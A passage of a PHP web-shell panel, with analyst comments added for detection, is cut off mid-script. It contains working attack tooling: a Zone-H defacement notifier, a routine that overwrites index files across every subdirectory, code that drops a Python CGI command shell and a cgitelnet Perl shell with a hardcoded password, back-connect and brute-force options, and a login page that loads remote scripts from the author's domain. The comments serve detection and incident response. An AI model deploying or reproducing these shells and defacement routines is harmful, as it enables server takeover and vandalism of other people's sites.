2540<option value="5" >I just want to be the best defacer</option>
2541<option value="6" >Patriotism</option>
2542<option value="7" >Not available</option>
2543</select>
2544<input type="hidden" name="action" value="zone">
2545<center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains">List Of Domains</textarea>
2546<br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>
2547</form></td></tr></table></form>
2548<!-- End Of Zone-H -->
2549</td></center><br><br>
2550
2551<?php
/*
 * Analyst note ("zone" panel driver). Runs whenever the panel is requested,
 * without checking that the form was submitted: it requires the curl
 * extension, reads defacer, hackmode, reason and domain from $_POST, and
 * die()s if the name or the domain list is empty. The domain list is split on
 * newlines and each entry is passed to ZoneH() (defined outside this excerpt)
 * together with a zone-h.org notification URL. The "Defaced !" line is
 * printed for every entry regardless of what ZoneH() returns.
 * Detection view: outbound requests from the web server to zone-h.org. A
 * listing of one's own domain in that archive is an external sign that this
 * panel was used.
 */
echo '<center>'; ob_start(); $sub = get_loaded_extensions(); if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');} $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $neden = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)){die ("[+] You Must Fill In The Attacker Name![+]");} elseif($method == "--------SELECT--------") {die("[+] You Must Select The Method![+]");} elseif($neden == "--------SELECT--------") {die("[+] You Must Select The Reason![+]");} elseif(empty($site)) {die("[+] You Must Inter the Sites List![+] ");} $i = 0; $sites = explode("\n", $site); while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "hxxp") {$sites[$i] = "hxxp://".$sites[$i];} ZoneH("hxxp://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]); echo "Site : ".$sites[$i]." Defaced !\n"; ++$i; } echo "[+] Successfully Submitted To Zone-H!! [+]"; echo '</center>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass-cf')) { echo '
2552<form method="POST"><br><br>
2553<center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">--==[ Bypass
2554<font color="#CC0000">CloudFlare</font> ]==--</font></b></p>
2555<select class="inputz" name="krz">
2556 <option>ftp</option>
2557 <option>direct-conntect</option>
2558 <option>webmail</option>
2559 <option>cpanel</option>
2560</select>
2561<input class="inputz" type="text" name="target" value="url">
2562<input class="inputzbut" type="submit" value="Bypass"></center>
2563
2564';
/*
 * Analyst note ("bypass-cf" panel). Prepends one of four fixed labels
 * (ftp., direct-connect., webmail., cpanel.) to $_POST['target'], resolves the
 * name with gethostbyname() and prints the result; $target is used
 * unvalidated. This is a plain DNS lookup: it only yields an origin address
 * when such a service record points at the origin instead of the proxy.
 * Hardening view: audit service subdomains so none of them resolves directly
 * to the origin, and restrict origin ingress to the proxy provider's address
 * ranges.
 */
$target = $_POST['target']; if($_POST['krz'] == "ftp") { $ftp = gethostbyname("ftp."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
2565ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>"; } if($_POST['krz'] == "direct-conntect") { $direct = gethostbyname("direct-connect."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
2566ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>"; } if($_POST['krz'] == "webmail") { $web = gethostbyname("webmail."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
2567ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>"; } if($_POST['krz'] == "cpanel") { $cpanel = gethostbyname("cpanel."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
2568ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'hashid')) {
/*
 * Analyst note ("hashid" panel). Labels $_POST['hash'] by string length
 * alone, with a substring check for a few prefixed formats, and stores the
 * label in $hashresult for the HTML that follows. Local computation only.
 * Because the chain tests strlen() first, the second and later branches for
 * an already-tested length (34 and 39) are never reached. When a length
 * matches but the inner substring check fails, $hashresult is left unset.
 */
if(isset($_POST['gethash'])){ $hash = $_POST['hash']; if(strlen($hash)==32){ $hashresult = "MD5 Hash"; }elseif(strlen($hash)==40){ $hashresult = "SHA-1 Hash/ /MySQL5 Hash"; }elseif(strlen($hash)==13){ $hashresult = "DES(Unix) Hash"; }elseif(strlen($hash)==16){ $hashresult = "MySQL Hash / /DES(Oracle Hash)"; }elseif(strlen($hash)==41){ $GetHashChar = substr($hash, 40); if($GetHashChar == "*"){ $hashresult = "MySQL5 Hash"; } }elseif(strlen($hash)==64){ $hashresult = "SHA-256 Hash"; }elseif(strlen($hash)==96){ $hashresult = "SHA-384 Hash"; }elseif(strlen($hash)==128){ $hashresult = "SHA-512 Hash"; }elseif(strlen($hash)==34){ if(strstr($hash, '$1$')){ $hashresult = "MD5(Unix) Hash"; } }elseif(strlen($hash)==37){ if(strstr($hash, '$apr1$')){ $hashresult = "MD5(APR) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$H$')){ $hashresult = "MD5(phpBB3) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$P$')){ $hashresult = "MD5(Wordpress) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$5$')){ $hashresult = "SHA-256(Unix) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$6$')){ $hashresult = "SHA-512(Unix) Hash"; } }elseif(strlen($hash)==24){ if(strstr($hash, '==')){ $hashresult = "MD5(Base-64) Hash"; } }else{ $hashresult = "Hash type not found"; } }else{ $hashresult = "No Hash Entered"; } ?>
2569 <center><br><Br><br>
2570
2571 <form action="" method="POST">
2572 <tr>
2573 <table class="tabnet">
2574 <th colspan="5">Hash Identification</th>
2575 <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
2576 <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
2577 </table></tr></form>
2578 </center>
2579
2580 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'python')) { echo "<center/><br/><b>
2581 --==[ Python Bypass Exploit ]==--
2582 </b><br><br>"; mkdir('python', 0755); chdir('python'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!"); $metin = "AddHandler cgi-script .izo"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $pythonp = '#!/usr/bin/python
2583# 07-07-04
2584# v1.0.0
2585
2586# cgi-shell.py
2587# A simple CGI that executes arbitrary shell commands.
2588
2589
2590# Copyright Michael Foord
2591# You are free to modify, use and relicense this code.
2592
2593# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
2594# Use at your own risk !!!
2595
2596# E-mail michael AT foord DOT me DOT uk
2597# Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html
2598
2599"""
2600A simple CGI script to execute shell commands via CGI.
2601"""
2602################################################################
2603# Imports
2604try:
2605 import cgitb; cgitb.enable()
2606except:
2607 pass
2608import sys, cgi, os
2609sys.stderr = sys.stdout
2610from time import strftime
2611import traceback
2612from StringIO import StringIO
2613from traceback import print_exc
2614
2615################################################################
2616# constants
2617
# Page-wide constants for the CGI output.
# NOTE(review): versionstring is a fixed string in every copy of this script as
# printed, so it can serve as a content-match term when scanning a web root.
2618fontline = '<FONT COLOR=#424242 style="font-family:times;font-size:12pt;">'
2619versionstring = 'Version 1.0.0 7th July 2004'
2620
# scriptname comes from the CGI variable SCRIPT_NAME and is later used as the
# form action. dict.has_key exists only in Python 2.
2621if os.environ.has_key("SCRIPT_NAME"):
2622 scriptname = os.environ["SCRIPT_NAME"]
2623else:
2624 scriptname = ""
2625
# The value itself contains double quotes; the form template adds its own.
2626METHOD = '"POST"'
2627
2628################################################################
2629# Private functions and variables
2630
# Copies the requested fields out of a cgi.FieldStorage-like object into a plain
# dict. Values are returned exactly as the client sent them; no validation or
# escaping happens here.
2631def getform(valuelist, theform, notpresent=''):
2632 """This function, given a CGI form, extracts the data from it, based on
2633 valuelist passed in. Any non-present values are set to '' - although this can be changed.
2634 (e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
2635 data = {}
2636 for field in valuelist:
    # has_key is the Python 2 spelling of the "in" test.
2637 if not theform.has_key(field):
2638 data[field] = notpresent
2639 else:
    # A repeated field arrives as a list of items; a single one has .value.
2640 if type(theform[field]) != type([]):
2641 data[field] = theform[field].value
2642 else:
2643 values = map(lambda x: x.value, theform[field]) # allows for list type values
2644 data[field] = values
2645 return data
2646
2647
# HTML templates for the response page.
# NOTE(review): the title and heading text are fixed, which makes them usable as
# content-match terms for this script on disk or in captured responses.
2648theformhead = """<HTML><HEAD><TITLE>cgi-shell.py - a CGI by Fuzzyman</TITLE></HEAD>
2649<BODY><CENTER>
2650<H1>Welcome to cgi-shell.py - <BR>a Python CGI</H1>
2651<B><I>By Fuzzyman</B></I><BR>
2652"""+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'.</CENTER><BR>'
2653
# The form posts a single text field named cmd back to scriptname. scriptname is
# concatenated into the action attribute without HTML escaping.
2654theform = """<H2>Enter Command</H2>
2655<FORM METHOD=\"""" + METHOD + '" action="' + scriptname + """\">
2656<input name=cmd type=text><BR>
2657<input type=submit value="Submit"><BR>
2658</FORM><BR><BR>"""
2659bodyend = '</BODY></HTML>'
2660errormess = '<CENTER><H2>Something Went Wrong</H2><BR><PRE>'
2661
2662################################################################
2663# main body of the script
2664
# Entry point: handles one CGI request.
# The form field "cmd" is taken as-is and handed to os.popen2, which runs a string
# command through the system shell; its standard output is printed back with
# newlines turned into <BR>. Neither the command nor its output is HTML-escaped,
# and no authentication check is visible in this script.
# NOTE(review): os.popen2, the print statement and "except Exception, e" are
# Python 2 only, so the script depends on a Python 2 interpreter at the shebang path.
# NOTE(review): for detection, requests that carry a cmd field to a CGI-handled
# file, and child processes started by the web server account, are the artefacts
# this code produces.
2665if __name__ == '__main__':
2666 print "Content-type: text/html" # this is the header to the server
2667 print # so is this blank line
2668 form = cgi.FieldStorage()
2669 data = getform(['cmd'],form)
2670 thecmd = data['cmd']
2671 print theformhead
2672 print theform
2673 if thecmd:
2674 print '<HR><BR><BR>'
    # The submitted command is echoed into the page unescaped.
2675 print '<B>Command : ', thecmd, '<BR><BR>'
2676 print 'Result : <BR><BR>'
2677 try:
    # Client-supplied string goes straight to the shell; stdin is closed unused.
2678 child_stdin, child_stdout = os.popen2(thecmd)
2679 child_stdin.close()
2680 result = child_stdout.read()
2681 child_stdout.close()
2682 print result.replace('\n', '<BR>')
2683
2684 except Exception, e: # an error in executing the command
    # The full traceback is printed to the client.
2685 print errormess
2686 f = StringIO()
2687 print_exc(file=f)
2688 a = f.getvalue().splitlines()
2689 for line in a:
2690 print line
2691
2692 print bodyend
2693
2694
2695"""
2696TODO/ISSUES
2697
2698
2699
2700CHANGELOG
2701
270207-07-04 Version 1.0.0
2703A very basic system for executing shell commands.
2704I may expand it into a proper 'environment' with session persistence...
2705"""'; $file = fopen("python.izo" ,"w+"); $write = fwrite ($file ,base64_decode($pythonp)); fclose($file); chmod("python.izo",0755); echo " <iframe src=python/python.izo width=96% height=76% frameborder=0></iframe>
2706
2707 </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'string')){ $text = $_POST['code']; ?><center><br><br><b>--==[ Script Encode & Decode ]==--</b><br><br>
2708<form method="post"><br><br><br>
2709<textarea class='inputz' cols=80 rows=10 name="code"></textarea><br><br>
2710<select class='inputz' size="1" name="ope">
2711<option value="base64">Base64</option>
2712<option value="gzinflate">str_rot13 - gzinflate - base64</option>
2713<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
2714</select> <input class='inputzbut' type='submit' name='submit' value='Encrypt'>
2715<input class='inputzbut' type='submit' name='submits' value='Decrypt'>
2716</form>
2717
2718<?php $submit = $_POST['submit']; if (isset($submit)){ $op = $_POST["ope"]; switch ($op) {case 'base64': $codi=base64_encode($text); break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text))))); break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text))); break;default:break;}} $submit = $_POST['submits']; if (isset($submit)){ $op = $_POST["ope"]; switch ($op) {case 'base64': $codi=base64_decode($text); break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text))))); break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text))); break;default:break;}} echo '<textarea cols=80 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'mass')) { echo "<center/><br/><b><font color=#FF0000>--==[ Mass Deface ]==--</font></b><br>"; error_reporting(0);?>
2719<form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
2720<td><table><table class="tabnet" >
2721<form hethot='post'>
2722<tr>
2723 <tr>
2724 <td> Folder</td><td><input class ='inputz' type='text' name='path' size='60' value="<?php echo getcwd();?>"></td>
2725 </tr><br>
2726 <tr>
2727 <td>File N</td><td><input class ='inputz' type='text' name='file' size='60' value="index.php"></td>
2728 </tr>
2729</tr>
2730<th colspan='2'><b>Index Code</b></th><br></table>
2731<textarea style='background:black;outline:none;' name='index' rows='10' cols='67'>r00t.info A</textarea><br>
2732<center><input class='inputzbut' type='submit' value=" Deface "></center></form></table><br></form>
2733
2734<?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'cgi')) { echo "<center/><br/><b><font color=blue>--==[ cgitelnet.v1 Bypass Exploit]==--</font></b><br><br>"; mkdir('cgitelnet1', 0755); chdir('cgitelnet1'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!"); $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
2735
2736AddType application/x-hxxpd-cgi .cin
2737
2738AddHandler cgi-script .cin
2739AddHandler cgi-script .cin"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $cgishellizocin = '#!/usr/bin/perl -I/usr/local/bandmin
# NOTE(review): $Version, $EditPersion and $Password are fixed strings in this copy
# of the script, which makes them usable as content-match terms when scanning a
# web root. The password is stored here in plain text and compared with eq in
# PerformLogin.
2740use MIME::Base64;
2741$Version= "CGI-Telnet Version 1.3";
2742$EditPersion="<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'>r00t.info - CGI-Telnet</font>";
2743
2744$Password = "r00t.info"; # Change this. You will need to enter this
2745 # to login.
# Is_Win: returns 1 when the CGI variable SERVER_SOFTWARE contains "win"
# (case-insensitive), otherwise 0. The trim helper is defined outside this excerpt.
# NOTE(review): the test looks at the web server banner, not at the operating
# system, so any banner containing those three letters is treated as Windows.
2746sub Is_Win(){
2747 $os = &trim($ENV{"SERVER_SOFTWARE"});
2748 if($os =~ m/win/i){
2749 return 1;
2750 }
2751 else{
2752 return 0;
2753 }
2754}
# Global settings derived once per request.
# NOTE(review): the comment beside $WinNT is stale; the value is computed by Is_Win
# from SERVER_SOFTWARE rather than set by hand.
2755$WinNT = &Is_Win(); # You need to change the value of this to 1 if
2756 # you're running this script on a Windows NT
2757 # machine. If you're running it on Unix, you
2758 # can leave the value as it is.
2759
2760$NTCmdSep = "&"; # This character is used to seperate 2 commands
2761 # in a command line on Windows NT.
2762
2763$UnixCmdSep = ";"; # This character is used to seperate 2 commands
2764 # in a command line on Unix.
2765
# NOTE(review): 10000 seconds is close to three hours, which contradicts the advice
# in the comment beside it. Long-lived child processes of the web server account
# are therefore possible and worth alerting on.
2766$CommandTimeoutDuration = 10000; # Time in seconds after commands will be killed
2767 # Don't set this to a very large value. This is
2768 # useful for commands that may hang or that
2769 # take very long to execute, like "find /".
2770 # This is valid only on Unix servers. It is
2771 # ignored on NT Servers.
2772
2773$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
2774 # browser as soon as it is output, otherwise
2775 # it is buffered and send when the command
2776 # completes. This is useful for commands like
2777 # ping, so that you can see the output as it
2778 # is being generated.
2779
2780# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
2781
# Platform-dependent pieces selected from $WinNT. $Redirector is not used inside
# this excerpt; presumably it is appended to command lines elsewhere - confirm.
2782$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
2783$CmdPwd = ($WinNT ? "cd" : "pwd");
2784$PathSep = ($WinNT ? "\\" : "/");
2785$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
2786$cols= 150;
2787$rows= 26;
2788#------------------------------------------------------------------------------
2789# Reads the input sent by the browser and parses the input variables. It
2790# parses GET, POST and multipart/form-data that is used for uploading files.
2791# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
2792# Other variables can be accessed using $in{'var'}, where var is the name of
2793# the variable. Note: Most of the code in this function is taken from other CGI
2794# scripts.
2795#------------------------------------------------------------------------------
# ReadParse: fills the global %in (or the glob passed as argument 1) from the request.
#   GET  -> $ENV{QUERY_STRING}; POST -> CONTENT_LENGTH bytes read from STDIN.
#   multipart/form-data: part 1 becomes $in{filedata} and $in{f} (the client file
#   name with quotes and whitespace stripped); later parts become $in{name} = value.
#   Otherwise the data is split on & and =, and percent-decoded.
# NOTE(review): nothing in this sub validates or bounds the input: the read length
# is the client-declared CONTENT_LENGTH and every value stored in %in is
# client-controlled.
2796sub ReadParse
2797{
2798 local (*in) = @_ if @_;
2799 local ($i, $loc, $key, $val);
2800
2801 $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
2802
2803 if($ENV{'REQUEST_METHOD'} eq "GET")
2804 {
2805 $in = $ENV{'QUERY_STRING'};
2806 }
2807 elsif($ENV{'REQUEST_METHOD'} eq "POST")
2808 {
    # Bitwise &, not the logical operator, combines the two flags here.
2809 binmode(STDIN) if $MultipartFormData & $WinNT;
2810 read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
2811 }
2812
2813 # handle file upload data
2814 if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
2815 {
    # The client-supplied boundary is interpolated into the split pattern as a
    # regular expression, without quoting.
2816 $Boundary = '--'.$1; # please refer to RFC1867
2817 @list = split(/$Boundary/, $in);
2818 $HeaderBody = $list[1];
2819 $HeaderBody =~ /\r\n\r\n|\n\n/;
2820 $Header = $`;
2821 $Body = $';
2822 $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
2823 $in{'filedata'} = $Body;
2824 $Header =~ /filename=\"(.+)\"/;
2825 $in{'f'} = $1;
2826 $in{'f'} =~ s/\"//g;
2827 $in{'f'} =~ s/\s//g;
2828
2829 # parse trailer
2830 for($i=2; $list[$i]; $i++)
2831 {
2832 $list[$i] =~ s/^.+name=$//;
2833 $list[$i] =~ /\"(\w+)\"/;
2834 $key = $1;
2835 $val = $';
2836 $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
2837 $val =~ s/%(..)/pack("c", hex($1))/ge;
2838 $in{$key} = $val;
2839 }
2840 }
2841 else # standard post data (url encoded, not multipart)
2842 {
2843 @in = split(/&/, $in);
2844 foreach $i (0 .. $#in)
2845 {
2846 $in[$i] =~ s/\+/ /g;
2847 ($key, $val) = split(/=/, $in[$i], 2);
2848 $key =~ s/%(..)/pack("c", hex($1))/ge;
2849 $val =~ s/%(..)/pack("c", hex($1))/ge;
    # A repeated key is kept as one string with NUL between the values.
2850 $in{$key} .= "\0" if (defined($in{$key}));
2851 $in{$key} .= $val;
2852 }
2853 }
2854}
2855
2856#------------------------------------------------------------------------------
2857# Prints the HTML Page Header
2858# Argument 1: Form item name to which focus should be set
2859#------------------------------------------------------------------------------
# PrintPageHeader: emits the Content-type header and the common page top (CSS, the
# chmod/rename helper JavaScript and the navigation bar) as one heredoc.
# Argument 1 is interpolated as @_ into the body onLoad handler to choose the form
# field that receives focus.
# $EncodedCurrentDir is $CurrentDir with every non-alphanumeric byte percent-encoded;
# $dir is $CurrentDir with backslashes doubled for use inside the JavaScript.
# Interpolated without HTML escaping: $HtmlMetaHeader, $dir, $EditPersion,
# $ScriptLocation and the SERVER_SOFTWARE, SERVER_ADDR and REMOTE_ADDR variables.
# NOTE(review): the navigation links show the action names this script accepts in
# the a= request parameter (command, gui, upload, download, backbind, bruteforcer,
# checklog, domainsuser, logout). Together with d= and f= they are stable strings to
# search for in web server access logs when scoping an incident; the forms elsewhere
# in the script use POST, so those parameters may only appear in request bodies.
2860sub PrintPageHeader
2861{
2862 $EncodedCurrentDir = $CurrentDir;
2863 $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
2864 my $dir =$CurrentDir;
2865 $dir=~ s/\\/\\\\/g;
2866 print "Content-type: text/html\n\n";
2867 print <<END;
2868<html>
2869<head>
2870<meta hxxp-equiv="content-type" content="text/html; charset=UTF-8">
2871<title> </title>
2872
2873$HtmlMetaHeader
2874
2875</head>
2876<style>
2877body{
2878font: 10pt Verdana;
2879}
2880tr {
2881BORDER-RIGHT: #3e3e3e 1px solid;
2882BORDER-TOP: #3e3e3e 1px solid;
2883BORDER-LEFT: #3e3e3e 1px solid;
2884BORDER-BOTTOM: #3e3e3e 1px solid;
2885color: #ff9900;
2886}
2887td {
2888BORDER-RIGHT: #3e3e3e 1px solid;
2889BORDER-TOP: #3e3e3e 1px solid;
2890BORDER-LEFT: #3e3e3e 1px solid;
2891BORDER-BOTTOM: #3e3e3e 1px solid;
2892color: #2BA8EC;
2893font: 10pt Verdana;
2894}
2895
2896table {
2897BORDER-RIGHT: #3e3e3e 1px solid;
2898BORDER-TOP: #3e3e3e 1px solid;
2899BORDER-LEFT: #3e3e3e 1px solid;
2900BORDER-BOTTOM: #3e3e3e 1px solid;
2901BACKGROUND-COLOR: #111;
2902}
2903
2904
2905input {
2906BORDER-RIGHT: #3e3e3e 1px solid;
2907BORDER-TOP: #3e3e3e 1px solid;
2908BORDER-LEFT: #3e3e3e 1px solid;
2909BORDER-BOTTOM: #3e3e3e 1px solid;
2910BACKGROUND-COLOR: Black;
2911font: 10pt Verdana;
2912color: #ff9900;
2913}
2914
2915input.submit {
2916text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
2917color: #FFFFFF;
2918border-color: #009900;
2919}
2920
2921code {
2922border : dashed 0px #333;
2923BACKGROUND-COLOR: Black;
2924font: 10pt Verdana bold;
2925color: while;
2926}
2927
2928run {
2929border : dashed 0px #333;
2930font: 10pt Verdana bold;
2931color: #FF00AA;
2932}
2933
2934textarea {
2935BORDER-RIGHT: #3e3e3e 1px solid;
2936BORDER-TOP: #3e3e3e 1px solid;
2937BORDER-LEFT: #3e3e3e 1px solid;
2938BORDER-BOTTOM: #3e3e3e 1px solid;
2939BACKGROUND-COLOR: #1b1b1b;
2940font: Fixedsys bold;
2941color: #aaa;
2942}
2943A:link {
2944 COLOR: #2BA8EC; TEXT-DECORATION: none
2945}
2946A:visited {
2947 COLOR: #2BA8EC; TEXT-DECORATION: none
2948}
2949A:hover {
2950 text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
2951 color: #ff9900; TEXT-DECORATION: none
2952}
2953A:active {
2954 color: Red; TEXT-DECORATION: none
2955}
2956
2957.listdir tr:hover{
2958 background: #444;
2959}
2960.listdir tr:hover td{
2961 background: #444;
2962 text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
2963 color: #FFFFFF; TEXT-DECORATION: none;
2964}
2965.notline{
2966 background: #111;
2967}
2968.line{
2969 background: #222;
2970}
2971</style>
2972<script language="javascript">
2973function chmod_form(i,file)
2974{
2975 /*var ajax='ajax_PostData("FormPerms_'+i+'","$ScriptLocation","ResponseData"); return false;';*/
2976 var ajax="";
2977 document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + " name=chmod type=text size=5 /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
2978 document.getElementById("text_" + i).focus();
2979}
2980function rm_chmod_form(response,i,perms,file)
2981{
2982 response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
2983}
2984function rename_form(i,file,f)
2985{
2986 var ajax="";
2987 f.replace(/\\\\/g,"\\\\\\\\");
2988 var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
2989 document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + " name=rename type=text value= '"+file+"' /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
2990 document.getElementById("text_" + i).focus();
2991}
2992function rm_rename_form(i,file,f)
2993{
2994 if(f=='f')
2995 {
2996 document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$dir&c=edit%20"+file+"%20'>" +file+ "</a>";
2997 }else
2998 {
2999 document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
3000 }
3001}
3002</script>
3003<body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
3004<center><code>
3005<table border="1" width="100%" cellspacing="0" cellpadding="2">
3006<tr>
3007 <td align="center" rowspan=2>
3008 <b><font size="5">$EditPersion</font></b>
3009 </td>
3010
3011 <td>
3012
3013 <font face="Verdana" size="2">$ENV{"SERVER_SOFTWARE"}</font>
3014 </td>
3015 <td>Server IP:<font color="#cc0000"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="#000000">$ENV{'REMOTE_ADDR'}</font>
3016 </td>
3017
3018</tr>
3019
3020<tr>
3021<td colspan="3"><font face="Verdana" size="2">
3022<a href="$ScriptLocation">Home</a> |
3023<a href="$ScriptLocation?a=command&d=$EncodedCurrentDir">Komut</a> |
3024<a href="$ScriptLocation?a=gui&d=$EncodedCurrentDir">Dizin</a> |
3025<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
3026<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
3027
3028<a href="$ScriptLocation?a=backbind">Back Connet</a> |
3029<a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
3030<a href="$ScriptLocation?a=checklog">Check Log</a> |
3031<a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
3032<a href="$ScriptLocation?a=logout">Logout</a> |
3033<a target='_blank' href="#">Help</a>
3034
3035</font></td>
3036</tr>
3037</table>
3038<font id="ResponseData" color="#ff99cc" >
3039END
3040}
3041
3042#------------------------------------------------------------------------------
3043# Prints the Login Screen
3044#------------------------------------------------------------------------------
# PrintLoginScreen: prints the pre-login splash as one heredoc: a typing-effect
# script (TypingText) that replays the markup of the element with id "hack", and
# a fake connection banner that interpolates $ServerName.
# NOTE(review): the heredoc also pulls two scripts from the author domain
# (r00t.info/bot/log.js and r00t.info/ccb.js, printed defanged as hxxp) and a
# background image from dl.dropbox.com. Any browser that renders this page contacts
# those hosts, so outbound requests to them are a network indicator, and the remote
# scripts run inside the page. What those scripts do is not visible in this file.
3045sub PrintLoginScreen
3046{
3047
3048 print <<END;
3049<pre><script type="text/javascript">
3050TypingText = function(element, interval, cursor, finishedCallback) {
3051 if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
3052 this.running = true; // Never run.
3053 return;
3054 }
3055 this.element = element;
3056 this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
3057 this.interval = (typeof interval == "undefined" ? 100 : interval);
3058 this.origText = this.element.innerHTML;
3059 this.unparsedOrigText = this.origText;
3060 this.cursor = (cursor ? cursor : "");
3061 this.currentText = "";
3062 this.currentChar = 0;
3063 this.element.typingText = this;
3064 if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
3065 TypingText.all.push(this);
3066 this.running = false;
3067 this.inTag = false;
3068 this.tagBuffer = "";
3069 this.inHTMLEntity = false;
3070 this.HTMLEntityBuffer = "";
3071}
3072TypingText.all = new Array();
3073TypingText.currentIndex = 0;
3074TypingText.runAll = function() {
3075 for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
3076}
3077TypingText.prototype.run = function() {
3078 if(this.running) return;
3079 if(typeof this.origText == "undefined") {
3080 setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
3081 return;
3082 }
3083 if(this.currentText == "") this.element.innerHTML = "";
3084// this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
3085 if(this.currentChar < this.origText.length) {
3086 if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
3087 this.tagBuffer = "<";
3088 this.inTag = true;
3089 this.currentChar++;
3090 this.run();
